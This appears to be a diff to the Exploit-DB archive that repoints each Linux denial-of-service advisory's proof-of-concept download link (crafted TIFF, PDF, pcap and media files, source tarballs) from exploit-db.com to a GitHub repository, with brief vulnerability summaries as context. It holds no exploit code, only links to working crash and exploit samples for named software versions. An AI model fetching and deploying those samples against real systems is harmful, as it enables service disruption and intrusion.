@ -146,5 +146,5 @@ Exploiting this issue allows remote attackers to cause denial-of-service conditi

 Expat 2.0.1 is vulnerable; other versions may also be affected. 

-http://www.exploit-db.com/sploits/2009-11-22-36097.gz
-http://www.exploit-db.com/sploits/2009-11-22-36097-2.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-11-22-36097-2.gz
--- a/platforms/linux/dos/14573.txt
+++ b/platforms/linux/dos/14573.txt
@ -6,4 +6,4 @@ An attacker can exploit this issue to crash an application that uses the vulnera
 Versions up to and including libTIFF 3.9.4 are vulnerable. 

 PoC:
-http://www.exploit-db.com/sploits/lp589145-sample.tif.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/lp589145-sample.tif.gz
--- a/platforms/linux/dos/18295.txt
+++ b/platforms/linux/dos/18295.txt
@ -218,5 +218,5 @@ Adam 'pi3' Zabrocki

 --
 http://pi3.com.pl
-http://www.exploit-db.com/sploits/p_cve-2011-4362.c
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/p_cve-2011-4362.c
 http://blog.pi3.com.pl/?p=277
--- a/platforms/linux/dos/23427.txt
+++ b/platforms/linux/dos/23427.txt
@ -52,4 +52,4 @@ si_addr:$2 = (void *) 0xaf625080 <gst_riff_create_audio_caps+1888>
 Proof of concept included.

 http://www41.zippyshare.com/v/13083235/file.html 
-http://www.exploit-db.com/sploits/23427.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23427.rar
--- a/platforms/linux/dos/23757.txt
+++ b/platforms/linux/dos/23757.txt
@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a remote denial of service

 Exploitation of this issue may cause the affected GameSpy developed game to crash, denying service to legitimate users.

-http://www.exploit-db.com/sploits/23757.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23757.zip
--- a/platforms/linux/dos/24815.txt
+++ b/platforms/linux/dos/24815.txt
@ -4,4 +4,4 @@ It has been reported that the GameSpy SDK is prone to a buffer overflow vulnerab

 Exploitation of this issue may allow attackers to execute arbitrary machine code in the context of the affected GameSpy developed game.

-http://www.exploit-db.com/sploits/24815.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24815.zip
--- a/platforms/linux/dos/24865.txt
+++ b/platforms/linux/dos/24865.txt
@ -10,7 +10,7 @@ Sorry I forgot to write headers in previous mail.
 # Tested on: [GNU/Linux]
 # CVE : [CVE-2012-1663]

-PoC: http://www.exploit-db.com/sploits/24865.tar.bz2
+PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24865.tar.bz2

 I'm glad to share this to you guys. The test code was attached. You
 also could find them here:
--- a/platforms/linux/dos/27762.txt
+++ b/platforms/linux/dos/27762.txt
@ -4,8 +4,8 @@ LibTIFF is affected by multiple denial-of-service vulnerabilities.

 An attacker can exploit these vulnerabilities to cause a denial of service in applications using the affected library.

-http://www.exploit-db.com/sploits/27762-1.tiff.0
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-1.tiff.0

-http://www.exploit-db.com/sploits/27762-2.tiff.1
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-2.tiff.1

-http://www.exploit-db.com/sploits/27762-3.tiff.100
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27762-3.tiff.100
--- a/platforms/linux/dos/27764.txt
+++ b/platforms/linux/dos/27764.txt
@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to an integer-overflow vulnerab

 An attacker could exploit this vulnerability to execute arbitrary code in the context of the vulnerable application that uses the affected library. Failed exploit attempts will likely cause denial-of-service conditions.

-http://www.exploit-db.com/sploits/27764.tiff.11
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27764.tiff.11
--- a/platforms/linux/dos/27765.txt
+++ b/platforms/linux/dos/27765.txt
@ -4,4 +4,4 @@ Applications using the LibTIFF library are prone to a double-free vulnerability;

 Attackers may be able to exploit this issue to cause denial-of-service conditions in affected applications using a vulnerable version of the library; arbitrary code execution may also be possible.

-http://www.exploit-db.com/sploits/27765.tiff.2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27765.tiff.2
--- a/platforms/linux/dos/27925.txt
+++ b/platforms/linux/dos/27925.txt
@ -6,4 +6,4 @@ This vulnerability allows local users to cause a kernel panic, denying further s

 This issue affects Linux kernel versions 2.6.15 through 2.6.17-rc5 on multiprocessor computers running SMP kernels. Other kernel versions may also be affected.

-http://www.exploit-db.com/sploits/27925.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27925.tgz
--- a/platforms/linux/dos/28348.txt
+++ b/platforms/linux/dos/28348.txt
@ -8,4 +8,4 @@ Exploiting this issue could allow attacker-supplied machine code to execute in t

 ClamAV versions 0.88.2 and 0.88.3 are vulnerable to this issue; prior versions may also be affected.

-http://www.exploit-db.com/sploits/28348.exe
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28348.exe
--- a/platforms/linux/dos/28358.txt
+++ b/platforms/linux/dos/28358.txt
@ -6,4 +6,4 @@ Remote attackers may trigger this issue by sending crafted UDP datagrams to affe

 Linux kernel versions 2.6.14.4, 2.6.17.6, and 2.6.17.7 are vulnerable to this issue; other versions in the 2.6 series are also likely affected.

-http://www.exploit-db.com/sploits/28358.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28358.tar.gz
--- a/platforms/linux/dos/28367.txt
+++ b/platforms/linux/dos/28367.txt
@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex

 AlsaPlayer 0.99.76, the CVS version as of 9 Aug 2006, and prior versions are vulnerable to this issue; other versions may also be affected.

-http://www.exploit-db.com/sploits/28367.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28367.zip
--- a/platforms/linux/dos/28380.txt
+++ b/platforms/linux/dos/28380.txt
@ -6,4 +6,4 @@ Attackers may likely exploit this issue to execute arbitrary machine code in the

 Mozilla Firefox is vulnerable to this issue. Due to code reuse, other Mozilla products are also likely affected.

-http://www.exploit-db.com/sploits/28380.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28380.zip
--- a/platforms/linux/dos/28383.txt
+++ b/platforms/linux/dos/28383.txt
@ -6,4 +6,4 @@ This issue allows attackers to execute arbitrary machine code in the context of

 ImageMagick versions in the 6.x series, up to version 6.2.8, are vulnerable to this issue.

-http://www.exploit-db.com/sploits/28383.sgi
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28383.sgi
--- a/platforms/linux/dos/28384.txt
+++ b/platforms/linux/dos/28384.txt
@ -6,4 +6,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex

 Versions 2.1.2, SVN 8406, and prior are vulnerable to this issue; other versions may also be affected.

-http://www.exploit-db.com/sploits/28384.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28384.zip
--- a/platforms/linux/dos/28895.txt
+++ b/platforms/linux/dos/28895.txt
@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability.

 An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.

-http://www.exploit-db.com/sploits/28895.img.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28895.img.gz
--- a/platforms/linux/dos/28912.txt
+++ b/platforms/linux/dos/28912.txt
@ -4,4 +4,4 @@ The Linux kernel is prone to a local denial-of-service vulnerability. This issue

 An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.

-http://www.exploit-db.com/sploits/28912.iso.bz2
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28912.iso.bz2
--- a/platforms/linux/dos/29399.txt
+++ b/platforms/linux/dos/29399.txt
@ -4,4 +4,4 @@ Multiple PDF readers are prone to multiple remote buffer-overflow vulnerabilitie

 An attacker may be able exploit this issue to execute arbitrary code within the context of the affected application. In some circumstances, the vulnerability can be exploited only to cause a denial of service.

-http://www.exploit-db.com/sploits/29399.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29399.pdf
--- a/platforms/linux/dos/29520.txt
+++ b/platforms/linux/dos/29520.txt
@ -4,4 +4,4 @@ Applications using the gtk2 library may be prone to a denial-of-service vulnerab

 An attacker can exploit this issue to crash applications on a victim's computer. 

-http://www.exploit-db.com/sploits/29520.mbox
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29520.mbox
--- a/platforms/linux/dos/29723.txt
+++ b/platforms/linux/dos/29723.txt
@ -10,4 +10,4 @@ Firefox 2.0.0.2 is prone to this issue; other versions may also be affected.

 GIMP version 2.2.12 is also reported vulnerable; a segmentation fault occurs when the application processes a malicious GIF image.

-http://www.exploit-db.com/sploits/29723.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29723.zip
--- a/platforms/linux/dos/29809.txt
+++ b/platforms/linux/dos/29809.txt
@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to consume excessive system resour

 PulseAudio 0.9.5 is vulnerable to this issue. 

-http://www.exploit-db.com/sploits/29809.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29809.zip
--- a/platforms/linux/dos/30024.txt
+++ b/platforms/linux/dos/30024.txt
@ -6,4 +6,4 @@ Successful exploits of this vulnerability allow remote attackers to execute arbi

 Versions of libexif prior to 0.6.14 are vulnerable to this issue. 

-http://www.exploit-db.com/sploits/30024.jpg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30024.jpg
--- a/platforms/linux/dos/30648.txt
+++ b/platforms/linux/dos/30648.txt
@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary machine code in the

 This issue affects versions prior to AlsaPlayer 0.99.80-rc3. 

-http://www.exploit-db.com/sploits/30648.ogg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30648.ogg
--- a/platforms/linux/dos/30776.txt
+++ b/platforms/linux/dos/30776.txt
@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o

 LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected. 

-http://www.exploit-db.com/sploits/30776.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30776.zip
--- a/platforms/linux/dos/30837.txt
+++ b/platforms/linux/dos/30837.txt
@ -6,4 +6,4 @@ Attackers can exploit this issue to cause denial-of-service conditions. Given th

 QEMU 0.9.0 is vulnerable; other versions may also be affected.

-http://www.exploit-db.com/sploits/30837.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30837.rar
--- a/platforms/linux/dos/30894.txt
+++ b/platforms/linux/dos/30894.txt
@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary

 These issues affect PeerCast 0.12.17, SVN 334 and prior versions.

-http://www.exploit-db.com/sploits/30894.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/30894.zip
--- a/platforms/linux/dos/31018.txt
+++ b/platforms/linux/dos/31018.txt
@ -6,7 +6,7 @@ Successfully exploiting this issue allows remote attackers to deny service to le

 These issues affect GStreamer 0.10.15; other versions may also be vulnerable. 

-http://www.exploit-db.com/sploits/31018-1.mpg
-http://www.exploit-db.com/sploits/31018-2.mpg
-http://www.exploit-db.com/sploits/31018-3.m2v
-http://www.exploit-db.com/sploits/31018-4.m2v
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-1.mpg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-2.mpg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-3.m2v
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31018-4.m2v
--- a/platforms/linux/dos/31054.txt
+++ b/platforms/linux/dos/31054.txt
@ -6,4 +6,4 @@ Attackers can leverage this issue to execute arbitrary code in the context of an

 Versions prior to SDL_image 1.2.7 are vulnerable. 

-http://www.exploit-db.com/sploits/31054.gif
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31054.gif
--- a/platforms/linux/dos/31218.txt
+++ b/platforms/linux/dos/31218.txt
@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected

 This issue affects freeSSHd 1.2.0 and prior versions.

-http://www.exploit-db.com/sploits/31218.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31218.zip
--- a/platforms/linux/dos/31552.txt
+++ b/platforms/linux/dos/31552.txt
@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to

 These issues affect Wireshark 0.99.2 up to and including 0.99.8. 

-http://www.exploit-db.com/sploits/31552.pcap
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31552.pcap
--- a/platforms/linux/dos/31553.txt
+++ b/platforms/linux/dos/31553.txt
@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
 
 These issues affect Wireshark 0.99.2 up to and including 0.99.8. 

-http://www.exploit-db.com/sploits/31553.pcap
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31553.pcap
--- a/platforms/linux/dos/31554.txt
+++ b/platforms/linux/dos/31554.txt
@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to
  
 These issues affect Wireshark 0.99.2 up to and including 0.99.8.
 
-http://www.exploit-db.com/sploits/31554.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31554.gz
--- a/platforms/linux/dos/31984.txt
+++ b/platforms/linux/dos/31984.txt
@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting

 This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected. 

-http://www.exploit-db.com/sploits/31984.jpg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31984.jpg
--- a/platforms/linux/dos/32018.txt
+++ b/platforms/linux/dos/32018.txt
@ -6,4 +6,4 @@ This issue arises when the software handles maliciously crafted SVG images.

 According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable. 

-http://www.exploit-db.com/sploits/32018.svg
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32018.svg
--- a/platforms/linux/dos/32019.txt
+++ b/platforms/linux/dos/32019.txt
@ -6,4 +6,4 @@ Remote attackers can exploit this issue by enticing victims into opening malicio

 Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service. 

-http://www.exploit-db.com/sploits/32019.iki
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32019.iki
--- a/platforms/linux/dos/32452.txt
+++ b/platforms/linux/dos/32452.txt
@ -17,4 +17,4 @@ UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.

 UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. 

-http://www.exploit-db.com/sploits/32452.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32452.zip
--- a/platforms/linux/dos/32740.txt
+++ b/platforms/linux/dos/32740.txt
@ -6,4 +6,4 @@ Attackers can exploit this issue to cause a kernel panic, denying service to leg

 QNX RTOS 6.4.0 is vulnerable; other versions may also be affected. 

-http://www.exploit-db.com/sploits/32740.bin
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32740.bin
--- a/platforms/linux/dos/32775.txt
+++ b/platforms/linux/dos/32775.txt
@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the kernel to crash, denying service t

 This issue affects versions prior to Linux kernel 2.6.27.14.

-http://www.exploit-db.com/sploits/32775.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32775.gz
--- a/platforms/linux/dos/32800.txt
+++ b/platforms/linux/dos/32800.txt
@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash applications

 These issues affect versions prior to Poppler 0.10.4.

-http://www.exploit-db.com/sploits/32800.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32800.pdf
--- a/platforms/linux/dos/32856.txt
+++ b/platforms/linux/dos/32856.txt
@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal

 Successfully exploiting this issue allows remote attackers to deny service to legitimate users. 

-http://www.exploit-db.com/sploits/32856.aac
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32856.aac
--- a/platforms/linux/dos/32857.txt
+++ b/platforms/linux/dos/32857.txt
@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal
 
 Successfully exploiting this issue allows remote attackers to deny service to legitimate users. 

-http://www.exploit-db.com/sploits/32857.ogm
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/32857.ogm
--- a/platforms/linux/dos/33017.txt
+++ b/platforms/linux/dos/33017.txt
@ -8,4 +8,4 @@ Acrobat 9.1.1 is vulnerable; other versions may also be affected.

 NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely. 

-http://www.exploit-db.com/sploits/33017.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33017.pdf
--- a/platforms/linux/dos/33049.txt
+++ b/platforms/linux/dos/33049.txt
@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co

 LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. 

-http://www.exploit-db.com/sploits/33049.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33049.zip
--- a/Show more
+++ b/Show more